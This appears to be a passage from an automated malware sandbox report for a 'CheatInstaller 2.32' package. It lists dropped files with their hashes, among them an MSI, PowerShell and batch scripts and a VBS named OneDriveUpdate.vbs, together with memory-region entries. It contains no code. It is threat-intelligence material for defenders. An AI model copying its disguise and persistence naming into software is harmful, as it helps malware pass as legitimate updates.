SHA512 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\wide-align\LICENSE

MD5 9d215c9223fbef14a4642cc450e7ed4b
SHA1 279f47bedbc7bb9520c5f26216b2323e8f0e728e
SHA256 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11
SHA512 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe

MD5 8b38c92c54d9a6c8c5495b6780f06f03
SHA1 ea81aa7cd651bd303e344aec0732a8b253d3fa0d
SHA256 48b2ae270b608b91d6123ead7073eca028002007ebcd8d6c3f1924a644bff19a
SHA512 e13d48e1b0478ba8a271931afe34621092f61be7dc91d6a26021a0ec24bf0f8f1879a8eb3e55a464d2fbc0af3416d686bcbc2988519c70f38a666191b2bca709

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe

MD5 3e748d7eb83110806a7f8e732aac4946
SHA1 12f52ed8ebfe3a298ab5dfe41cddb28780cc7875
SHA256 ad577a0747d1995ddf8c7466a2ff9cbc0080d187c15a8916dc2a1af82f781f10
SHA512 4ec9c117413eaf8b8515d07e276a111cb1a9a5e962f109cbd8bfd0cc4e4397c5e6a52feb1fac6a3d16cd93072c2c1470d5e4828c920159344602da989c7d6669

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 911d55404e4f018aab30393f95f5a0da
SHA1 c0727d78bf46f7b85d9d11752de4ecf1a424dbb4
SHA256 48474e1462169bd2c86309ddeecdfd7ea0eda61dc190041fab9073c149c50e76
SHA512 b58f2401f0d5efaff05bb48ed4f38db19a794227cc1c6a2e13498721536307e11004c11308a5893c69e71a33c028466d67a012f148453ab74f3f6c1fbd03e78c

C:\Users\Admin\AppData\Local\Temp\MSI5CA8.tmp

MD5 c9c085c00bc24802f066e5412defcf50
SHA1 557f02469f3f236097d015327d7ca77260e2aecc
SHA256 a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24
SHA512 a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

C:\Users\Admin\AppData\Local\Temp\MSI5D75.tmp

MD5 6bb65410717bb2c62ed92cdbc9c41652
SHA1 1f0d56a24588c0c07e878f348df6bb0c3e4f693a
SHA256 91a6c5daebe89b7d9157188a2b3fa8e47d53b4d20c29bcc244635d1943397f7b
SHA512 1a864c6d010e3d62337a2067f53e82067ab01a556edee65036658bb7dd863bf22379d16aaf6385fda23060148c68c7225610058a153420e7b125c038285ceb38

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 294ceffc1fc15ab2a56429f7b2e485cd
SHA1 d572ad55a44e59d239141dfbef5bf2a2075b761e
SHA256 6597bec37a328b04bf0e9300a264c30883a3a975921a50076898ab70fe2a8663
SHA512 9be1d4c4551e15098726361ffcafe62a1cb1afdf859ce587c6426112f0316d70c11304162f8ed799fe37d288293a559496af1f8c85a6ac66e5a11cce427687f1

C:\Windows\Installer\MSI5FB5.tmp

MD5 db51934d0c02bd97d619f83d3152490a
SHA1 875e56adf2d67ec4ce1102cad07be07eada31909
SHA256 88ed96b10ce49e29e3bb8b5a48ff32ee29370ceac55a699a8894f438f1216521
SHA512 1db8159a57a0183c96a32793d87b8fc2d8c082c9f1208ebf0c65fe6331b9e039902e86d1d5e25a503ab35d9c86142a3fd6abfd315e7d0167ce67364986f6ff9c

C:\Windows\Installer\MSI6023.tmp

MD5 1a608f644bce169e60f087174985d5c6
SHA1 b33516de05ae7e722cdf37d72a8a00a930535da1
SHA256 03197c048d9319e34ebffd0bbdabc8204904363ea147bfa05090347954873ffa
SHA512 c59b9517af933be4dd2ac0612c35ca63a916efbee8d6987dd7c0fdb87c5bb898465ea176a0b04b70f0ea54900fb4a60e430c1fcc63e531110719dff137706093

C:\Windows\Installer\MSI6023.tmp

MD5 44cf2ecadadb296473c83026a9276a4f
SHA1 9ab5b561d55c0994722ebbab19b069bcba1e013a
SHA256 7e8a735bc59d5b8f0638e55bcd2bb0359f5d0dc31e129b35ff645417ec21030e
SHA512 4b913860e7e1f328cabc956a8e85dbf2d8b6df6526c5ceb93683b59cefaa38eb790e035a16d33abd77e00f4c164890991b35f24af2edb14cc9f7cc5319ac59bd

C:\Windows\Installer\MSI6043.tmp

MD5 e50e988c5e8422ad8f8473ab9debfe7c
SHA1 f44b051491fbe5f70be700b9a0b6e5b7e772a560
SHA256 76994fd01764fa9f6d61498e32b5b2866cfa6ee817c7dc6641e5e08262522e20
SHA512 f3c388f6ab1bd392bf212631cf79a3d8294fbedc9eaab5d64cd46b92e889b8f363eec4f3cdda3952d23ba44ac51edad6acadb0a0c07d6e2c6eac7db6fde077aa

C:\Windows\Installer\MSI6064.tmp

MD5 ae7b2bdd2b39212c8b633ad6c7787854
SHA1 95246691cb6b69fbd94205ab8cab6e5ff4605874
SHA256 8abaf07af16d724fb52d7ffbe232d7de1aea64b3f22914d279a489c725650600
SHA512 266f86487b3106d3c587381290ff2237a9d4883d6dc61d0c8f5ae6129f11799926c94e0e61006c52b54cd3ef0e3e0720ed0073b0ed384d7d4e4835f7c946ad00

C:\Windows\Installer\MSI6064.tmp

MD5 bd88f6a954116e29fdabab012f21bd95
SHA1 6549e3599982530f96d3929a5dd967c5d73e71a7
SHA256 1f65807f4737495dfec496508cf59880d9f52226c866375892d2c5c0fe11f635
SHA512 fd601d46f7ae22fd23810a941af363374ea3a0993340c642bf13d66f399cb839c32db198967dbe58dd6c6c318807696d32086774b39074da1294ec1f9b79c259

C:\Windows\Installer\MSI6074.tmp

MD5 dc23c2fcad1208dfd5a0593d9aaf8959
SHA1 23fca7bf608b4ab8dce17b4321f063e0690d05ae
SHA256 e46b1c28ad98a149d6884d6d429cebde1d86054368f5731d90af4e7e54428797
SHA512 ce4546d04acf9cf86a2f3e488f8a6fe76e9f240c51ea4da1f6a46f33890d86d4b77a915b07e4132d463f94bf3996b70829bcf49088eb538619515e468dbed1c0

C:\Windows\Installer\MSI6074.tmp

MD5 bec613269a2d3e8571d6aa87feb9b5e5
SHA1 ed92247884c731eb59a8ad6c63ec632d70650cde
SHA256 63b5316fc6dde716e391cad47a7de4a67b0c2e5579ce10a7ab46302b86146e01
SHA512 6de27f3a1cf48b9c62bd270f59d6d39e01aa39ba6e5ce730cad1fd0c549cdd92026aca43ed12bb0730207adceafa460195c4854a9a77f4d91d29569964dad0b2

memory/4492-3581-0x000001EBCB450000-0x000001EBCB472000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0o2tesud.keo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4492-3591-0x00007FFDF80D0000-0x00007FFDF8B91000-memory.dmp

memory/4492-3593-0x000001EBCB4A0000-0x000001EBCB4B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss60EF.ps1

MD5 a8a3a992fce81410c5771c10f743f6ba
SHA1 d0dd0c52514afa2150b250e549dfebf87758f191
SHA256 bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee
SHA512 3edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830

memory/4492-3592-0x000001EBCB4A0000-0x000001EBCB4B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scr60DF.txt

MD5 64d1817b6bfcd6cfda309f8910f51b57
SHA1 9faf2d4a707b789de6970b53b0dc80ac47ec3c52
SHA256 067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391
SHA512 d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee

C:\Users\Admin\AppData\Local\Temp\scr60DE.ps1

MD5 b4aaf8eaa1aa2477670ed54128e2c742
SHA1 b756fb677993bcf92916be8979052ed14a6170da
SHA256 5a4a897b8e922880f81b7ad94877acf3b394fffc1811d8826035b33d383624ba
SHA512 078503e1424578aa7a6791d1c962b801c1066958851d04ec4b8e24fc4ac5eecb4c013dc8484d04b5a5177a8bded08ba743f98ac69c656f7b79039fc8d1d7c55f

C:\Users\Admin\AppData\Local\Temp\progressbad.bat

MD5 d3dff05f50e0edcecca77d97468a1aef
SHA1 87a217697bd981c8a9dc5a94ae65daf3ece5f081
SHA256 86cad2a008f8a7be294be384100f6c0cc0cc4bbdb154174b81ea8c61bc85748e
SHA512 0b897b0697b3beb69dbe22db514ce53f3fb0b456fc14b79e4719b840bf17165a594a052230f2242647cf0fc047b4066461aa5af5289d5869926d16189dc8f005

C:\Users\Admin\AppData\Local\Temp\progressgood.bat

MD5 845cf6630a4a8d184f93d0f732feb846
SHA1 1d9219177aaf25e5a95bdc72ec8cd6fd42e6cace
SHA256 19f3274b5b004259d609e624e54259d1637074a97ab7e6452ddd2bd81ee29153
SHA512 bb6e45187eb464ba6eec05c368ea13c43667307804b10215b5753209fb8d1cdacf0b1fb3460849069211ac76b8706c772f85704b7b7361626798cce373bdac1e

memory/4492-3665-0x00007FFDF80D0000-0x00007FFDF8B91000-memory.dmp

C:\Windows\Installer\MSI6430.tmp

MD5 2557173f4299722afce46cc3c0616406
SHA1 b0343c9a9552be977834e415783b486c4714fe97
SHA256 e25369e33c7ef36151769a86d833189b275f85045f35873e9e931547e0a6d591
SHA512 24a46359cb8e22534cbd875fe092d096e3280ca4c24936159894ba95832233ee318494a3eabbdf73ae6010e39a1b5897b4488b2771b416b472bb7f60ceddf40e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_pp.wav

MD5 26140fd064fcb60410eaeb1170edbe86
SHA1 96c07c5b4f8e7b04a2c67fc2c2e790f268d8a189
SHA256 bd0b71a62133b30682c1f9763055fc06f3f583d73d0ad6ad10cba34801d61f15
SHA512 7590b51f5e07b3753f45786823a6d13a3aa9fc1417b5accad574637ed128a21a0804b7a154f75a7194481443ad7ea096f5210df5c4223a7fda5e6c24b6ac152c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_timit.wav

MD5 abfb6646580180315119cf6318ac7ca2
SHA1 eafcdba602d993801c6fb7a1ea7c930c4534c342
SHA256 05973a2b9923c12f060f9f15112ba8f4213a98361f8192c93612fd2c03d0aa9f
SHA512 bab6d55b21ceb368d6d4e0738a33072d052dd4090e93c936bfb2b7551eefb578c4da322b7f04f18e6e54cdb7e3bed8f347f55bef5819d1b744af55134820b080

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.frm

MD5 ac330f2a89a6c828059d1f125cb9cb60
SHA1 a40b10eae1fba1ea43ff70b3941a165d6d0502f2
SHA256 9b2123a554181148e29bbeb66f18da5619b1fd796e4f3de49415748822fef4ec
SHA512 0fd4ac721c969496423c336128c8b3751f3752176c891d85e13cbfc226fcfa00751aab1d1d400ee6b70031b6abaa86fb975f45f30b6c0e8789df27904dedcc42

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_sc09.wav

MD5 b218f120d3bd872bfe920445dfa6ed85
SHA1 5d1e19770eb937fc7ea6664876c4b1347242ad13
SHA256 52749b074df5a64563f7da3dd8215d99cf8df97b89cba2ff33eeacdaab63ab5c
SHA512 d59a7102cb6761ef3830393eee24c19354b198b5f2d31d8e76b0953ff9cce66bfbf139f5df775cb799dac9ca08fd9b5f71b64f5c004f003fb0a955f911f61a71

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_ita.txt

MD5 89e2a161df2ef245781707ff93e978bc
SHA1 ab2189d5c8dca09cade0586b929f0264c327db32
SHA256 b8f747babf732bb64a9cfc60a09b79001c87eb3b37d9704174c0964a49ed6f4a
SHA512 0e78e380198330cb143b17490d4540473d359a0198888dfd59ff5b1a94a8637f0e6e8998d2ea6ef83794d41771db449bb4abdc2692872a21ebd7d585652b4115

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_tatum.wav

MD5 abff0b7cce663eb6fef721059a3942ef
SHA1 a7fad88167d4343187045941d597901273672991
SHA256 23a2b2d185a0c599c9c2f6f3c13c99c3e45fe4483d9b3e21f168d468a0c88eee
SHA512 0f2e4ff221152ffa3a3be288224490fe1ed5f3d2fbb9372e99b95b1f7ec999a85f6408bfc4688b737b58d1ce61755e033d2c73bb410ced409753b29158e1dade

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_samplernn.wav

MD5 22ddd2e3b427bf6d4e2d34312f555c32
SHA1 94bbb914aad395b59512440a1aec84a219fb45ad
SHA256 236fabe68150a65f8d17367736291a55e1734bcdfc48172e95cffb28e75bcbf5
SHA512 7c4b88e31f173fbe30fac4cc9f849db57746285a61dd04c7d97bba1a86d68bae41bdb4e9c14b4133f1ef1c93cf1e0fd0778b4bd25e395f604f26bfddea98c876

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.MYI

MD5 f0bb4307afbd586f0499f4023213863d
SHA1 cd978f445f02aab75b1d89c5e28e348860d8c306
SHA256 49a2cd5ce74b5969db3eb785c02fda21f207672b2348c95252b3200d05281129
SHA512 a4327e9535d84ad98b4880764a05141170febf1c02d3fb74f71d704185e8176545c15ecfa34e5c8218cc33f4b7f07deb1fe0f2c06c1b400a3798a75016de861c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\wavegan_piano.wav

MD5 7552d8fb169511e2c573517f840b98ee
SHA1 1c524bdc58879aebc30f5c0715627ae5c261b674
SHA256 8ad760a3a8f470f3f8fed50c4f9377cfc46339e3edf7f0b39215877636a006a5
SHA512 72312cf653a0f6ed54a6ea95f6cbe0a7913cff902bc17f300ee647be4071474431240e1f3acdd0946f66db31ffe2bde6dc085fef01faebd4fa31139c4cfc1891

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\slow_log.frm

MD5 5cf177c70e9be2f41adc86ea7e0fc48b
SHA1 9a597f4d25a0fb4837fa06b9b3792de65fae9551
SHA256 9276bfd579b31e71a0f85e8b1085e6f00aafc1428b3c5dee2e765e80c34260a3
SHA512 054f52c54dd936a87ad49f1b31fbf248962ad6909686a98e3b76c6772f7ffbb09e6ecb336c3ff6499eadd45746e407c90992fe5e93f44d0e7feee4cab1e071a1

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_relation.MYI

MD5 b7d1f26327bf857bf6ce98ea4fda22b1
SHA1 b3f9c0dd62d5a7f533be36664f8e4954cd1f216d
SHA256 7ce3f6771b4c0a0c0e662dc51ecb460aae223bb3292eaea6c1c6f1bb805b3786
SHA512 91e83b2a3aa885e240f2634d15662954aa0d1104b85ae7bf33948b6bcffcbf763baddb3ecdabd15de53d6eda23d765716891b4dbaaf70168b837480f055e5ab2

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_birds.wav

MD5 f3041bafaf3ec12f0bd0aa02039a8ed3
SHA1 a553bd6f32e2dd147e4c58dae5708f52727e397d
SHA256 50106bb6bdc28114e731bceaebe9bc8aa6c2a9c57112c3e4a896a107e708991c
SHA512 f65de9b514f0e4a2c0458e3c4fe0fe34f56672b3ca6b354120b0909fad0c4eac4c6c69d6a4e62a11df3019b3b9d9c6fca87a4ae4246c15d1bbaea582750b5b71

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_topic.frm

MD5 ccaca741f4002cb8af48d485501ec8e9
SHA1 4895716a9baf869a5ba2ec1c2d0523b7bc8a6cb3
SHA256 0e2099aa021c0a2819f8f80960d729e66f69754675bfe847af8923029a330ec1
SHA512 09f005f1e7e8f9f388031c673a593c8afac42298b6f97ff708babfbc403a952692a0bbfbab3ebbd89f8506c2ec7bdb4154f70827680b6dfd390f80054ff2910a

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\general_log.frm

MD5 ea26bb989e3e2c321a47d499d2682ae1
SHA1 a79e8c99186c20fb09f1457b3d183538e1e1b1bb
SHA256 4a208c39ac55c440fa336c3463428609db81112512f6551a1331a516a2d1da81
SHA512 07f2b43db67b76b463c1770dd6ddb445bbcefcd8f8dfb85e9c28306cf5282272805516dd3166851b66a8358e16632a09a524d6918aae8711d97939beda53137e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\watchdog.ps1

MD5 beceb9c4ac840a5ac0b51d8774e63149
SHA1 ea375fee5ff404065ba724e877c9a9b01509353b
SHA256 d2011dcd715dad784b01709bd0af62c07a91aad758f6e461005178a74c2d3b34
SHA512 48e705691523f9804e152433c15142757def6e8dfa72f5dd08169576f7a5073d5e43cce1e148f7df19a566fb863cd377adfcdbeab5308b4cafe9afec9715365d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\event.csv

MD5 2620f56f03159589486b831d9b6adc4a
SHA1 55dfc135be75692bd64c50b429dcd5460e0b0b90
SHA256 8438f31c41c8214d92ef0227b0e45eae937e6e5221e410af1ad3735dc9e2ee71
SHA512 2915b402391b79635679f415c085646fa3fa6a888b4d00ee9be8aac101760815df6dd390b76192c5d695a116dfd2d297a1e3323b678b184e320049061b974f01

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\OneDriveUpdate.vbs

MD5 214ee30dbd649af9294f254fc8c33d07
SHA1 e81a7486c5c19868abb7d39fc757f686c4124662
SHA256 d9747024f7951c01c90b39e18ebe0a490a956625422f165d53f917ae062c4e52
SHA512 f1309c116fcaa64b372946686c3a22b0574db717aef91c095fbb70cbeb4125077f363ad9ce0d4a9ec12bc9f61d61df8ef35f5ac20a6a8b9f68b95203b5f93d19

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_sc09.wav

MD5 f137e2adf87a9e48225580b1cead0270
SHA1 767fcbb4a6fa7f3baac85cf5f3d5a746486af42d
SHA256 bdb588e0fa1cb9be1aba9d16599c1edfcaf1a4fc1c8e24f257e60624e6d888ad
SHA512 fec550bf0cdf7db384c6e72d6cd26ff1f5d7b079c1e47319d4b5a71a4f44119abde555bb7e229623f4873d121c6a7543287334b48aebe3b38db22f2b6afba937

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_fre.txt

MD5 5b1a12edc7b4e82163e5b39694e5b630
SHA1 088d6df18ce940cf01789a27adeaa150f9dc26b7
SHA256 206bac7b50b6bd8467ccffcb6d0833c4c8c58a2e82d205f608d4127ddc3402c9
SHA512 07846ad52962fc7f07b9e950343f906db5ac09287ced6d4659dae5f99f3fc8ee02916d66557dc2a0a7edbca0a716d8b26c252642558417986532cc28428494cc

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_parametric.wav

MD5 bf57fcd0d7233ba9a4e1b2379e5f9364
SHA1 0d406307a11814e047e26ed2c0b1225ea0ce8562
SHA256 663c9a4a76552bff4959c76d7b8d08aa4e745a226ed81dee39bf5564e4ab0dcc
SHA512 2aef9241a9e905f954030f79e1a7413cd00c25207776fb093325f2304aa8acfeb15924522cfacaa3515ed3a0999454e8cfed569f0dfd12ed23f62826e97556ee

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps4.wav

MD5 366e54e44c0134dfe1cb55e80b310e5b
SHA1 9a7b6a7860bb11c62d63be75487cedbab752b6cb
SHA256 c12a921042721bcb97f51ed6904b7d3bb401d339921979c72ab197576c8dda3f
SHA512 bdc8b0671cf75728eb24c1cced2356f7d735dd6ce14b7d4c6d2d2ac5180eeeea6e69ab8d3e20b6a3923c2b57fc856c4890567883600588a68185ccc6dd70f156

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavenet_r9y9.wav

MD5 1e8d240c9ecf3fd156be15abcf9b7d00
SHA1 4844a074435d9a61978ef8f1a3fc4119453392ec
SHA256 27e17e7f5b84189698c248b87173be282078e7aba1dd21a2613c1f871315e035
SHA512 a8ae95aaec0add143364369919051d106cd4cfc3501821ca5bea44942d5fdaf8740c01fa438f0f49ce07667bd9af500eae5605a76235cd5731d58dd42a7e472a

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_specgan.wav

MD5 4a268694795b8d7780cade83f261ccc6
SHA1 d2f995b6230692c90acbadee478c58ba285c9d03
SHA256 8d89b9fac3e59a46b06035c6712cae571b7b403a884b6fe62571f9485e8ba4f8
SHA512 45afd511f41c801674885e293ef59822c9b9cad1e570bed5b8a8ab71f5a02d13dcfe2e79680127f1d9d9355dc67162de4efa1c6bdc624c6ffd01840a019874ed

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_timit.wav

MD5 f7dd81493fa198987691706e10d89c6e
SHA1 97c7ad37f472380625c7e97e4848a128a242c019
SHA256 8fd05d1203c14632a1cae86f431859214436e1661721320c34d2cb0da87647e1
SHA512 ca94fb54bc10718a00f133aab12eff01eec340f93a56820d6d20a3eb4c9efcdb3a44b23d060a08bf283bb534016b8d0deb25292056b4c4fc456be0ae08400f10

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_birds.wav

MD5 2c0d5a3a7bdaae1f713f93d8853ef0d8
SHA1 989cfbfa40a46fe96a8a27da1d7a43f388e528d8
SHA256 14f31486d164dd2d029aa1a08715ea4c79d582ab22e859f36fe5ded505a9e248
SHA512 c3bb75694a870faa2e99791c8b3f322af34659c51d4f7d56ea1113fa15c9b312a66a7e6966597c4305b81b9c793ba3ff0ab5c1400326a272e19c48a8f609a8e1

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_piano.wav

MD5 ba50faf2804b2109a07460cc00fa4e31
SHA1 755c0e7b23a1009fc26a8da0df4fccef97d299e4
SHA256 364fc44a0a8842d85f1e02ce0f84cc2e6a746d6f52d13edbdf7a11d766845d42
SHA512 e9d3ff77b8dcf2be65c6473775748ad612c712d2a4fd3d990bef3003883890f06b874f1d1eb4cf708f33235332ac3125d99e76faa46f795e88df4d1d660480fc

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_drums.wav

MD5 83a0299b48453b02e1107a737de95dd9
SHA1 49ef4deeb11bd7a6999f98d52f1a14d5744bf138
SHA256 835927801706291377794d2ba8d0d010c700617f5ddada031dec043a4b39d716
SHA512 0f552900810aa144da3678080984b5e131afe84c4cd67b5c66cb55bc5b5ce806b7cc1f9e00685288d693e43256dc54bc4a79c423d0fc5075742237a8e247d65c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps2.wav

MD5 cfcc8ff85e9b9b894cd7a18629c2ca0a
SHA1 95bb5c02711465fad2af8c9ecc763257142474ed
SHA256 74026f437685a251fa4282670fcc6e52abd2a3ca32f6288e58de8219759abb19
SHA512 8a41acfdbb21bdc62a18f64289b900ff48cd5e2cc038498c1d3ba09a2c8c6a56954b4b26200149bc2919e9dcc62d8257fda76884d92c0fdff30b32566a80d000

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_piano.wav

MD5 2961f5e2f6c682ce702692e26e23b601
SHA1 128d743dd8b346b5bca3a64bbee0f3ce2ab64625
SHA256 0044a1b49a3ba69f60ae7d5b3a69c8dc83f01429f9eed0d31a77e0c28fdf3e56
SHA512 e00883d102ae8d8633551fe62f79c90bea0309e6d67f092b75dee0fc2f4f23a3ab095087412404dec3bff1bd8f95f76a17da2e8751fc41a75fd8fdbc3da9f1a2

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_drums.wav

MD5 b272ec8a16ee7bfed8491d6c511b1010
SHA1 5b8fa353e4a06399a17d368ac5985ec4c41d92b1
SHA256 18faa3995ecca0a706a9b6e401a5ac9c36a3648061715e48ace89ae11577109d
SHA512 b1217bd73c52096a87822d92b8e1d1d54b6c90122947e07e8ece9a2871a968f30dd4f5cb1d3c0d34389001c0b31a0cdf675d7d2fea34cb732b1f6d33eb1f0075

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_birds.wav

MD5 9c3bcedcf3d7667b547cc4747faa7c6f
SHA1 e08ce2f84a5f238ae3eb6a846e99c0aa9143a3d6
SHA256 a930e5e5839b25fac2a49a4700af83357756f86b0d95ec67176335ff1322582d
SHA512 9686b1d5e2ed94e9d20964b676ec6f81622260a11e9c06f71bf1508a15a3aa216ed39ed1eb13cbaa0d77a174a52f62401bb2662c8dd7bbca833df6876ea2353c

C:\Windows\Installer\MSI7128.tmp

MD5 893ba4758befd44d7a98cfbab3b8ae59
SHA1 da1f7d55e9cd68e740c1b2b77ccbe54a60b79f49
SHA256 c3460668a76ab4b74ea48d4e40a66fa61a851f9c1681991849eca626fef0b357
SHA512 aa6986369781f6d224ebdb820bce3bce8222c76f388f3fb42e0471a4cbcaf480e34768fa0f2a7529544fd207260cee3c51f9306f0d35ed53bf28832ca3d26e04

C:\Windows\Installer\MSI7273.tmp

MD5 0a5b2ccf5c324f8ffcf5f738c2889f99
SHA1 be94a08c397beed3128e76454d2b7c651924aac7
SHA256 51cbd76c919ae7b4ea441ca6c5fd4d3a405a573cf0d876bcb9f8fea7d65772f7
SHA512 e38e1b53e112dd2278b1c22c988615754fb33a2549aab8065b3f302a018cc26897acbdcc3c0e7af1ccbd6eb074c3789a8801be8a4bc845bf45c38bb342c2152c

memory/5584-3841-0x00000000032B0000-0x00000000032E6000-memory.dmp

memory/5584-3842-0x0000000071360000-0x0000000071B10000-memory.dmp

memory/5584-3845-0x00000000032A0000-0x00000000032B0000-memory.dmp

memory/5584-3843-0x00000000032A0000-0x00000000032B0000-memory.dmp

memory/5584-3846-0x0000000005990000-0x0000000005FB8000-memory.dmp

memory/5584-3847-0x00000000060F0000-0x0000000006112000-memory.dmp

memory/5584-3857-0x0000000006190000-0x00000000061F6000-memory.dmp

memory/2692-3869-0x000001DE444E0000-0x000001DE444F0000-memory.dmp

memory/5584-3868-0x0000000006410000-0x0000000006476000-memory.dmp

memory/2692-3856-0x00007FFDF80D0000-0x00007FFDF8B91000-memory.dmp

memory/2692-3870-0x000001DE444E0000-0x000001DE444F0000-memory.dmp

memory/5584-3871-0x0000000006480000-0x00000000067D4000-memory.dmp

memory/5584-3873-0x0000000006880000-0x000000000689E000-memory.dmp

memory/5584-3874-0x00000000068C0000-0x000000000690C000-memory.dmp

memory/2692-3875-0x00007FFDF80D0000-0x00007FFDF8B91000-memory.dmp

memory/832-3885-0x00007FFDF80D0000-0x00007FFDF8B91000-memory.dmp

memory/832-3886-0x000001FFF7520000-0x000001FFF7530000-memory.dmp

memory/832-3887-0x000001FFF7520000-0x000001FFF7530000-memory.dmp

memory/832-3889-0x00007FFDF80D0000-0x00007FFDF8B91000-memory.dmp

memory/4556-3890-0x00007FFDF80D0000-0x00007FFDF8B91000-memory.dmp

memory/4556-3896-0x0000018376370000-0x0000018376380000-memory.dmp

memory/4556-3903-0x00007FFDF80D0000-0x00007FFDF8B91000-memory.dmp

memory/5584-3902-0x0000000007FF0000-0x000000000866A000-memory.dmp

memory/5584-3904-0x0000000006DE0000-0x0000000006DFA000-memory.dmp

memory/6036-3914-0x00007FFDF80D0000-0x00007FFDF8B91000-memory.dmp

memory/6036-3915-0x000001F376C30000-0x000001F376C40000-memory.dmp

memory/6036-3916-0x000001F376C30000-0x000001F376C40000-memory.dmp

memory/5584-3917-0x0000000007970000-0x0000000007A06000-memory.dmp

memory/5584-3918-0x0000000007840000-0x0000000007862000-memory.dmp

memory/5584-3919-0x0000000008670000-0x0000000008C14000-memory.dmp

memory/5584-3920-0x0000000007DF0000-0x0000000007E82000-memory.dmp

memory/5584-3922-0x0000000007DB0000-0x0000000007DBA000-memory.dmp

memory/5584-3924-0x0000000071360000-0x0000000071B10000-memory.dmp

memory/5584-3925-0x00000000032A0000-0x00000000032B0000-memory.dmp

memory/6036-3923-0x00007FFDF80D0000-0x00007FFDF8B91000-memory.dmp

memory/5724-3926-0x00007FFDF80D0000-0x00007FFDF8B91000-memory.dmp

memory/5724-3936-0x00000260B5F60000-0x00000260B5F70000-memory.dmp

memory/5724-3937-0x00000260B5F60000-0x00000260B5F70000-memory.dmp

